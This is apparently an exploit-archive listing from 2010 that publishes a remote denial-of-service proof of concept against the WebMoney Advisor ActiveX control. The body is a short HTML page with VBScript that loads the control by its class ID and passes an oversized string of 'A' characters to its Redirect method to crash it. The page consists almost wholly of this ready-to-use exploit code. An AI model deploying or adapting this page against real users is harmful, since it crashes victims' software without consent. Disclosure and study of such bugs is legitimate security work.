Webmoney Advisor ActiveX Remote DoS Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Webmoney Advisor ActiveX Remote DoS Exploit
# Published : 2010-04-28
# Author : Go0o$E
# Previous Title : Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit
# Next Title : Safari 4.0.3 & 4.0.4 Stack Exhaustion

<html>
Pwnage Page
<object classid='clsid:3AFFD7F7-FD3D-4C9D-8F83-03296A1A8840' id='target' ></object>
<script language='vbscript'>

targetFile = "C:Program FilesWebMoney Advisorwmadvisor.dll"
prototype  = "Sub Redirect ( ByVal url As String )"
memberName = "Redirect"
progid     = "TOOLBAR3Lib.ToolbarObj"
argCount   = 1

arg1=String(1337, "A")
target.Redirect arg1 
</script>